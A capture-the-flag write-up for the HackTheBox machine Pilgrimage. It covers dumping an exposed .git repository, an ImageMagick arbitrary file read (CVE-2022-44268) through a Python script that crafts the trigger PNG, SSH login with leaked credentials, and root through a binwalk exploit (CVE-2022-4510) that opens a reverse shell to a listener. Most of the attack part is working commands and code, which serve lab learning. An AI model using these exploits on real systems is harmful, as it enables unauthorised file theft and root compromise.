#hackthebox #easy #linux #git #git-dumper
![[Pasted image 20250802014010.png]]
# Information Gathering - Nmap
First, as usual, I performed a TCP scan against all ports and discovered 2 open ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:33 UTC
Nmap scan report for 10.10.11.219
Host is up (0.052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
```
Then a service and script scan (`-sCV`) against the two open ports, 22 and 80, to gather more information.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:34 UTC
Nmap scan report for 10.10.11.219
Host is up (0.045s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
| 256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_ 256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds
```
Lastly, a UDP scan against the top 10 ports. Nothing was conclusively open there; `open|filtered` only means no ICMP unreachable came back.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:36 UTC
Nmap scan report for 10.10.11.219
Host is up (0.046s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
123/udp open|filtered ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
161/udp closed snmp
445/udp closed microsoft-ds
631/udp open|filtered ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds
```
---
# Enumeration
##### HTTP - TCP 80
The landing page redirected to `http://pilgrimage.htb/` (nmap already noted it could not follow that redirect), so I added `pilgrimage.htb` to `/etc/hosts`.
This is what the landing page looks like: an image-shrinking service.
![[Pasted image 20250801204903.png]]
On the `login` page I tried some default credentials, but they did not work, so I registered an account of my own.
I wanted to try the shrink feature and see what happens, so I uploaded a random image and pressed the `shrink` button.
![[Pasted image 20250801205334.png]]
Then, on the `Dashboard` page, there were URLs for the shrunken images I had uploaded (I tried twice). Notice that the names of the uploaded image files have been replaced with random strings.
![[Pasted image 20250801205756.png]]
Burp also shows that even when I changed the file name to end in `.php`, the backend renamed the file back to `.png`, so getting a webshell through the upload is unlikely.
![[Pasted image 20250801222401.png]]
After adding `pilgrimage.htb` to `/etc/hosts` I ran the `nmap` script scan again, this time against the hostname, and the `http-git` script reported an exposed `.git` directory under the web root.
```bash
80/tcp open http nginx 1.18.0
|_http-title: Pilgrimage - Shrink Your Images
|_http-server-header: nginx/1.18.0
| http-git:
| 10.10.11.219:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
```
I used `git-dumper` to dump the `.git` directory:
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git-dumper http://pilgrimage.htb/.git/ git_loot/
[-] Testing http://pilgrimage.htb/.git/HEAD [200]
[-] Testing http://pilgrimage.htb/.git/ [403]
[-] Fetching common files
...
<SNIP>
```
It contained the following. What stood out was `magick`, a stripped ELF binary shipped inside the web root, presumably the tool that does the actual shrinking (the renaming of uploads is done in the PHP). Vendored binaries like this rarely get updated, so its version is worth checking.
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ls
assets dashboard.php index.php login.php logout.php magick register.php vendor
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ file *
assets: directory
dashboard.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
index.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
login.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
logout.php: PHP script, ASCII text, with CRLF line terminators
magick: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9fdbc145689e0fb79cb7291203431012ae8e1911, stripped
register.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
vendor: directory
```
`git log` revealed only a single commit, but it gave us a username: `emily`.
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ git log
commit e1a40beebc7035212efdcb15476f9c994e3634a7 (HEAD -> master)
Author: emily <...>
Date: Wed Jun 7 20:11:48 2023 +1000
Pilgrimage image shrinking service initial commit.
```
`./magick --version` revealed the binary's version. Let's check whether it has any known vulnerabilities.
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
```
This version, ImageMagick 7.1.0-49, is affected by CVE-2022-44268, an arbitrary file read. The PNG coder treats a text chunk with the keyword `profile` as an instruction to read the file named in the chunk's text and attach it to the image as a profile; when the image is written back out (the shrink feature resizes and re-encodes every upload), that profile, i.e. the file's contents, is embedded in the output PNG as a hex dump. Whatever the web server process can read, we can read.
![[Pasted image 20250801224041.png]]
A PoC can be found [here](https://git.rotfl.io/v/CVE-2022-44268). The author wrote a detailed step-by-step guide. First, I cloned the repo:
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git clone https://git.rotfl.io/v/CVE-2022-44268.git
Cloning into 'CVE-2022-44268'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 30 (delta 8), reused 30 (delta 8), pack-reused 0
Receiving objects: 100% (30/30), 954.74 KiB | 1.22 MiB/s, done.
Resolving deltas: 100% (8/8), done.
```
Run `cargo run "/etc/passwd"`, which embeds the path in `image.png`:
```bash
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ ls
Cargo.lock Cargo.toml image.png README.md screens src
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ cargo run "/etc/passwd"
Updating crates.io index
Downloaded bitflags v1.3.2
Downloaded cfg-if v1.0.0
Downloaded adler v1.0.2
Downloaded hex v0.4.3
Downloaded crc32fast v1.3.2
Downloaded png v0.17.7
Downloaded flate2 v1.0.25
Downloaded miniz_oxide v0.6.2
Downloaded 8 crates (301.4 KB) in 0.23s
Compiling crc32fast v1.3.2
Compiling cfg-if v1.0.0
Compiling adler v1.0.2
Compiling bitflags v1.3.2
Compiling hex v0.4.3
Compiling miniz_oxide v0.6.2
Compiling flate2 v1.0.25
Compiling png v0.17.7
Compiling cve-2022-44268 v0.1.0 (/home/kali/Desktop/CVE-2022-44268)
Finished `dev` profile [unoptimized + debuginfo] target(s) in 4.84s
Running `target/debug/cve-2022-44268 /etc/passwd`
```
Next, process the crafted image with the dumped `magick` binary and inspect the output with `identify -verbose`. The resize forces ImageMagick to decode and re-encode the PNG, which is when the file named in the `profile` chunk is read and written into the output. Running this locally against the dumped binary only leaks files from my own machine, but it confirms the trigger works. To read files from the target, the same `image.png` is uploaded through the shrink feature, and the shrunk result is downloaded from the dashboard and passed to `identify -verbose`.
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ./magick image.png -resize 50% output.png
magick: keyword "Raw profile type ": bad character '0x20' `output.png' @ warning/png.c/MagickPNGWarningHandler/1750.
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ls
assets dashboard.php image.png index.php login.php logout.php magick output.png register.php vendor
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ identify -verbose output.png
Image:
Filename: output.png
Permissions: rw-rw-r--
Format: PNG (Portable Network Graphics)
Mime type: image/png
...
<SNIP>
```
Scroll down to the bottom of the output and you will find the leaked data as a hex dump under `Raw profile type`.
![[Pasted image 20250801225236.png]]
Converting the hex back to bytes gives the actual `/etc/passwd` contents. The read happens as the `www-data` user, so we will not be able to read emily's `.ssh` directory.
```bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```
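As an added example (not the page's Rust PoC, and not ImageMagick's own code), here is a self-contained Python script that does the two things the procedure above does: it crafts the PNG that triggers CVE-2022-44268, and it decodes the hex blob that comes back. It assumes, from the ImageMagick PNG coder, that the trigger is a `tEXt` chunk whose keyword is `profile` and whose text is the file path, and that the leaked bytes are written back as a text profile laid out as a type line, a right-aligned decimal length, then hex rows of 36 bytes. `format_raw_profile` reproduces that layout only so the decoder can be exercised offline on constructed sample bytes; against a real target you feed `decode_raw_profile` the `identify -verbose` output of the shrunk image.

```python
"""Craft a CVE-2022-44268 trigger PNG and decode the leaked 'Raw profile type' hex.
Added example; the chunk keyword and profile layout are assumptions taken from
ImageMagick's PNG coder, not code from the page or the PoC repository."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
HEX_CHARS = set("0123456789abcdefABCDEF")


def png_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def craft_png(path_to_read: str) -> bytes:
    """Minimal 1x1 RGBA PNG whose tEXt chunk has keyword 'profile' and the target
    path as its text. A vulnerable ImageMagick reads that path while decoding."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)  # 1x1, 8-bit, RGBA
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00\xff")  # filter byte + one pixel
    text = b"profile\x00" + path_to_read.encode("latin-1")  # keyword, NUL, text
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", idat)
            + png_chunk(b"IEND", b""))


def png_chunks(data: bytes) -> list:
    """Parse a PNG into (type, data) pairs, checking the signature and every CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    out, pos = [], len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on chunk {ctype!r}")
        out.append((ctype, body))
        pos += 12 + length
    return out


def format_raw_profile(profile_type: str, data: bytes) -> str:
    """Lay data out the way ImageMagick writes a 'Raw profile type' text chunk
    (assumption): newline, type name, newline, %8lu length, then 36-byte hex rows."""
    rows = [data[i:i + 36].hex() for i in range(0, len(data), 36)]
    return f"\n{profile_type}\n{len(data):8d}\n" + "\n".join(rows) + "\n"


def decode_raw_profile(text: str) -> bytes:
    """Recover the leaked bytes from identify -verbose output (or the chunk text):
    find the decimal length line, then gather hex rows until that many bytes are in."""
    lines = [ln.strip() for ln in text.splitlines()]
    for idx, ln in enumerate(lines):
        if ln.isdigit():
            declared, start = int(ln), idx + 1
            break
    else:
        raise ValueError("no length line found")
    hexbuf, have = [], 0
    for ln in lines[start:]:
        if not ln:
            continue
        if not set(ln) <= HEX_CHARS:
            break  # identify has moved on to the next property
        hexbuf.append(ln)
        have += len(ln)
        if have >= declared * 2:
            break
    raw = bytes.fromhex("".join(hexbuf)[:declared * 2])
    if len(raw) != declared:
        raise ValueError(f"declared {declared} bytes, decoded {len(raw)}")
    return raw


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open("image.png", "wb") as fh:
        fh.write(craft_png(target))
    print(f"wrote image.png carrying profile -> {target}")
```

`png_chunks` is there so you can confirm the crafted file is a structurally valid PNG before uploading it; a bad CRC or missing `IEND` makes the PNG coder bail out before it ever looks at the text chunk.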
Then I went back to the dumped repo and found the path of the SQLite database, `/var/db/pilgrimage`, in the PHP source. I'm going to repeat the steps to read that file and see what it contains.
![[Pasted image 20250801232633.png]]
```bash
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ cargo run "/var/db/pilgrimage"
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.01s
Running `target/debug/cve-2022-44268 /var/db/pilgrimage`
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ exiftool image.png
ExifTool Version Number : 13.25
File Name : image.png
Directory : .
File Size : 1660 bytes
File Modification Date/Time : 2025:08:02 04:27:37+00:00
File Access Date/Time : 2025:08:02 04:24:34+00:00
File Inode Change Date/Time : 2025:08:02 04:27:37+00:00
File Permissions : -rw-rw-r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 200
Image Height : 200
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Profile : /var/db/pilgrimage
Image Size : 200x200
Megapixels : 0.040
```
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ head sqlite.hex
<SNIP>
┌──(kali㉿kali)-[~/Desktop]
└─$ cat sqlite.hex | xxd -r -p > sqlite.db
```
After repeating the steps for `/var/db/pilgrimage`, I found emily's credentials inside. The application stores passwords in plaintext, so the database leak hands over a usable password directly.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlite3 sqlite.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL);
INSERT INTO users VALUES('emily','abigchonkyboi123');
CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL);
COMMIT;
sqlite>
```
# Initial Access - shell as `emily`
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh emily@$IP
emily@10.10.11.219's password:
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
emily@pilgrimage:~$ whoami
emily
```
Found `user.txt`
```bash
emily@pilgrimage:~$ cat user.txt
fe1...
```
# Privilege Escalation
`ps faux | grep root` revealed an unusual process. Let's look at what this script does.
![[Pasted image 20250802010423.png]]
`inotifywait` watches `/var/www/pilgrimage.htb/shrunk` for file creation events; each new file is passed to `binwalk -e`, which not only scans it but also extracts whatever it recognises, and the file is deleted only if binwalk's output contains one of the two blacklisted strings. The process list showed this script running as root, so root is extracting attacker-controlled files with binwalk: any extraction bug in binwalk becomes code execution as root.
```bash
emily@pilgrimage:/home$ cat /usr/sbin/malwarescan.sh
#!/bin/bash
blacklist=("Executable script" "Microsoft executable")
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
binout="$(/usr/local/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
done
done
```
The version of `binwalk` is 2.3.2
```bash
emily@pilgrimage:/home$ binwalk
Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk
Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...
Signature Scan Options:
-B, --signature Scan target file(s) for common file signatures
-R, --raw=<str> Scan target file(s) for the specified sequence of bytes
-A, --opcodes Scan target file(s) for common executable opcode signatures
-m, --magic=<file> Specify a custom magic file to use
-b, --dumb Disable smart signature keywords
-I, --invalid Show results marked as invalid
-x, --exclude=<str> Exclude results that match <str>
-y, --include=<str> Only show results that match <str>
```
This version of binwalk has a known vulnerability, CVE-2022-4510: a path traversal in its PFS extractor that lets a crafted file write outside the extraction directory, which the public PoC turns into remote command execution.
![[Pasted image 20250802011340.png]]
The PoC takes three arguments: a `.png` file to embed the payload in, the listener IP, and the listener port.
![[Pasted image 20250802011642.png]]
I transferred the PoC to `/dev/shm` on the target and created an empty `exploit.png` as its input file. When it ran successfully, it wrote the payload as `binwalk_exploit.png` (the banner refers to it as `binwalk_exploit`) and told me to rename and share it.
```bash
emily@pilgrimage:/dev/shm$ python3 51249.py exploit.png 10.10.14.14 1234
################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################
You can now rename and share binwalk_exploit and start your local netcat listener.
```
Since `inotifywait` in `malwarescan.sh` watches `/var/www/pilgrimage.htb/shrunk` for new files, the payload has to land in that directory to make root run binwalk on it. With a netcat listener on port 1234, I copied `binwalk_exploit.png` to `/var/www/pilgrimage.htb/shrunk` and got a reverse shell as `root`!
![[Pasted image 20250802012649.png]]
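The class of bug behind CVE-2022-4510 is an extractor that writes entries to an archive-supplied path without checking that the result stays inside the extraction directory; in binwalk's case the PFS extractor, which lets a crafted file drop a Python plugin into `~/.config/binwalk/plugins/` that binwalk imports on its next run. Because `malwarescan.sh` runs binwalk as root, that single write is the whole privilege escalation. The following is an added example, not binwalk's code and not the PoC: it uses a toy archive format (an assumption made for this example, not PFS) to show the vulnerable write next to the hardened one, and `demo()` builds a constructed archive whose first entry name is the same kind of traversal path the real exploit relies on.

```python
"""Extractor path traversal, vulnerable vs hardened. Added example; the toy archive
format and all function names are this example's own, not binwalk's."""
import os
import struct
import tempfile

# Toy format (assumption): records of  name\0  |  4-byte big-endian size  |  bytes.


def pack_toy_archive(entries: dict) -> bytes:
    """Build a toy archive from {name: data}; names are taken verbatim, as PFS does."""
    blob = b""
    for name, data in entries.items():
        blob += name.encode() + b"\x00" + struct.pack(">I", len(data)) + data
    return blob


def parse_toy_archive(blob: bytes):
    """Yield (name, data) records from a toy archive."""
    pos = 0
    while pos < len(blob):
        end = blob.index(b"\x00", pos)
        name = blob[pos:end].decode()
        (size,) = struct.unpack(">I", blob[end + 1:end + 5])
        yield name, blob[end + 5:end + 5 + size]
        pos = end + 5 + size


def extract_unsafe(blob: bytes, dest: str) -> list:
    """Vulnerable pattern: the archive-supplied name is joined to dest with no
    containment check, so '../' components walk out of the extraction directory."""
    written = []
    for name, data in parse_toy_archive(blob):
        path = os.path.join(dest, name)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        written.append(os.path.realpath(path))
    return written


def extract_safe(blob: bytes, dest: str) -> list:
    """Hardened form: resolve the final path and refuse anything outside dest.
    realpath also defuses a symlink planted by an earlier entry of the same archive."""
    root = os.path.realpath(dest)
    written = []
    for name, data in parse_toy_archive(blob):
        if os.path.isabs(name):
            raise ValueError(f"absolute path in archive: {name!r}")
        target = os.path.realpath(os.path.join(root, name))
        if os.path.commonpath([root, target]) != root:
            raise ValueError(f"path traversal blocked: {name!r}")
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as fh:
            fh.write(data)
        written.append(target)
    return written


def demo() -> dict:
    """Run both extractors on a constructed archive whose first entry escapes the
    output directory. Returns where the unsafe one wrote and whether the safe one refused."""
    plugin = b"# a binwalk plugin dropped here would run on the next binwalk invocation\n"
    blob = pack_toy_archive({"../../.config/binwalk/plugins/binwalk.py": plugin,
                             "benign.txt": b"hello\n"})
    with tempfile.TemporaryDirectory() as tmp:
        top = os.path.realpath(tmp)
        dest = os.path.join(top, "work", "_exploit.extracted")
        os.makedirs(dest)
        unsafe_paths = extract_unsafe(blob, dest)
        escaped = [p for p in unsafe_paths if not p.startswith(dest + os.sep)]
        try:
            extract_safe(blob, dest)
            refused = False
        except ValueError:
            refused = True
        return {"escaped_to": [os.path.relpath(p, top) for p in escaped],
                "safe_refused": refused}


if __name__ == "__main__":
    print(demo())
```

The check in `extract_safe` is deliberately on the resolved path rather than on the raw name: rejecting `..` substrings alone misses symlink tricks, and `realpath` plus `commonpath` catches both. When auditing an extractor (or deciding whether a root cron job should be running one on untrusted input), this is the check to look for.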
Found `root.txt`
```bash
cat root.txt
621...
```